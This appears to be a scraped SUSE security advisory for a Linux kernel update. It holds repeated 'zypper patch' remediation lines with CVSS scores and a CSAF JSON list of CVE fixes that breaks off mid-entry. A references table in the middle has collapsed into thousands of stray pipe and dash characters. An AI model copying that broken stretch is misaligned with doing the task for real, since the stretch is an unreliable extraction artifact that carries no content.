To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise Micro 6.0 and Micro 6.1 kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2023-54013: interconnect: Fix locking for runpm vs reclaim (bsc#1256280).\n- CVE-2025-38321: smb: Log an error when close_all_cached_dirs fails (bsc#1246328).\n- CVE-2025-38728: smb3: fix for slab out of bounds on mount to ksmbd (bsc#1249256).\n- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).\n- CVE-2025-39890: wifi: ath12k: fix memory leak in ath12k_service_ready_ext_event (bsc#1250334).\n- CVE-2025-39977: futex: Prevent use-after-free during requeue-PI (bsc#1252046).\n- CVE-2025-40006: mm/hugetlb: fix folio is still mapped when deleted (bsc#1252342).\n- CVE-2025-40024: vhost: Take a reference on the task in struct vhost_task (bsc#1252686).\n- CVE-2025-40033: remoteproc: pru: Fix potential NULL pointer dereference in pru_rproc_set_ctable() (bsc#1252824).\n- CVE-2025-40042: tracing: Fix race condition in kprobe initialization causing NULL pointer dereference (bsc#1252861).\n- CVE-2025-40053: net: dlink: handle copy_thresh allocation failure (bsc#1252808).\n- CVE-2025-40081: perf: arm_spe: Prevent overflow in PERF_IDX2OFF() (bsc#1252776).\n- CVE-2025-40102: KVM: arm64: Prevent access to vCPU events before init (bsc#1252919).\n- CVE-2025-40123: bpf: Enforce expected_attach_type for tailcall compatibility (bsc#1253365).\n- CVE-2025-40134: dm: fix NULL pointer dereference in __dm_suspend() (bsc#1253386).\n- CVE-2025-40135: ipv6: use RCU in ip6_xmit() (bsc#1253342).\n- CVE-2025-40153: mm: hugetlb: avoid soft lockup when mprotect to large memory area (bsc#1253408).\n- CVE-2025-40158: ipv6: use RCU in ip6_output() (bsc#1253402).\n- CVE-2025-40160: xen/events: Cleanup find_virq() return codes (bsc#1253400).\n- CVE-2025-40167: ext4: detect invalid INLINE_DATA + EXTENTS flag combination (bsc#1253458).\n- CVE-2025-40170: net: use dst_dev_rcu() in sk_setup_caps() (bsc#1253413).\n- CVE-2025-40178: pid: Add a judgment for ns null in pid_nr_ns (bsc#1253463).\n- CVE-2025-40179: ext4: verify orphan file size is not too big (bsc#1253442).\n- CVE-2025-40187: net/sctp: fix a null dereference in sctp_disposition sctp_sf_do_5_1D_ce() (bsc#1253647).\n- CVE-2025-40190: ext4: guard against EA inode refcount underflow in xattr update (bsc#1253623).\n- CVE-2025-40215: kABI: xfrm: delete x-\u003etunnel as we delete x (bsc#1254959).\n- CVE-2025-40220: fuse: fix livelock in synchronous file put from fuseblk workers (bsc#1254520).\n- CVE-2025-40231: vsock: fix lock inversion in vsock_assign_transport() (bsc#1254815).\n- CVE-2025-40233: ocfs2: clear extent cache after moving/defragmenting extents (bsc#1254813).\n- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).\n- CVE-2025-40240: sctp: avoid NULL dereference when chunk data buffer is missing (bsc#1254869).\n- CVE-2025-40242: gfs2: Fix unlikely race in gdlm_put_lock (bsc#1255075).\n- CVE-2025-40248: vsock: Ignore signal/timeout on connect() if already established (bsc#1254864).\n- CVE-2025-40250: net/mlx5: Clean up only new IRQ glue on request_irq() failure (bsc#1254854).\n- CVE-2025-40251: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy (bsc#1254856).\n- CVE-2025-40252: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() (bsc#1254849).\n- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).\n- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1254843).\n- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).\n- CVE-2025-40261: nvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).\n- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).\n- CVE-2025-40268: cifs: client: fix memory leak in smb3_fs_context_parse_param (bsc#1255082).\n- CVE-2025-40271: fs/proc: fix uaf in proc_readdir_de() (bsc#1255297).\n- CVE-2025-40274: KVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying (bsc#1254830).\n- CVE-2025-40278: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak (bsc#1254825).\n- CVE-2025-40279: net: sched: act_connmark: initialize struct tc_ife to fix kernel leak (bsc#1254846).\n- CVE-2025-40280: tipc: Fix use-after-free in tipc_mon_reinit_self() (bsc#1254847).\n- CVE-2025-40287: exfat: fix improper check of dentry.stream.valid_size (bsc#1255030).\n- CVE-2025-40289: drm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM (bsc#1255042).\n- CVE-2025-40292: virtio-net: fix received length check in big packets (bsc#1255175).\n- CVE-2025-40293: iommufd: Don\u0027t overflow during division for dirty tracking (bsc#1255179).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255187).\n- CVE-2025-40307: exfat: validate cluster allocation bits of the allocation bitmap (bsc#1255039).\n- CVE-2025-40319: bpf: Sync pending IRQ work before freeing ring buffer (bsc#1254794).\n- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).\n- CVE-2025-40331: sctp: Prevent TOCTOU out-of-bounds write (bsc#1254615).\n- CVE-2025-40337: net: stmmac: Correctly handle Rx checksum offload errors (bsc#1255081).\n- CVE-2025-40338: ASoC: Intel: avs: Do not share the name pointer between components (bsc#1255273).\n- CVE-2025-40339: drm/amdgpu: fix nullptr err of vm_handle_moved (bsc#1255428).\n- CVE-2025-40346: arch_topology: Fix incorrect error check in topology_parse_cpu_capacity() (bsc#1255318).\n- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).\n- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).\n- CVE-2025-40360: drm/sysfb: Do not dereference NULL pointer in plane reset (bsc#1255095).\n- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).\n- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).\n- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).\n- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).\n- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).\n- CVE-2025-68190: drm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked() (bsc#1255131).\n- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).\n- CVE-2025-68201: drm/amdgpu: remove two invalid BUG_ON()s (bsc#1255136).\n- CVE-2025-68204: pmdomain: arm: scmi: Fix genpd leak on provider registration failure (bsc#1255224).\n- CVE-2025-68206: netfilter: nft_ct: add seqadj extension for natted connections (bsc#1255142).\n- CVE-2025-68208: bpf: account for current allocated stack depth in widen_imprecise_scalars() (bsc#1255227).\n- CVE-2025-68209: mlx5: Fix default values in create CQ (bsc#1255230).\n- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).\n- CVE-2025-68230: drm/amdgpu: fix gpu page fault after hibernation on PF passthrough (bsc#1255134).\n- CVE-2025-68239: binfmt_misc: restore write access before closing files opened by open_exec() (bsc#1255272).\n- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).\n- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).\n- CVE-2025-68255: staging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing (bsc#1255395).\n- CVE-2025-68259: KVM: SVM: Don\u0027t skip unrelated instruction if INT3/INTO is replaced (bsc#1255199).\n- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).\n- CVE-2025-68264: ext4: refresh inline data size before write operations (bsc#1255380).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).\n- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).\n- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).\n- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).\n- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).\n- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).\n- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).\n- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).\n- CVE-2025-68340: team: Move team device type change at the end of team_port_add (bsc#1255507).\n- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).\n- CVE-2025-68363: bpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu (bsc#1255552).\n- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).\n- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).\n- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).\n- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).\n- CVE-2025-68378: bpf: Refactor stack map trace depth calculation into helper function (bsc#1255614).\n- CVE-2025-68379: RDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure (bsc#1255695).\n- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).\n- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).\n- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).\n- CVE-2025-68742: bpf: Improve program stats run-time calculation (bsc#1255707).\n- CVE-2025-68744: bpf: Free special fields when update [lru_,]percpu_hash maps (bsc#1255709).\n- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).\n- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).\n- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).\n- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).\n- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).\n- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).\n- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).\n- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).\n- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).\n- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).\n- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).\n- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).\n- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).\n- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).\n- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).\n- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).\n- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).\n- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).\n- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).\n- CVE-2025-71085: ipv6: BUG() 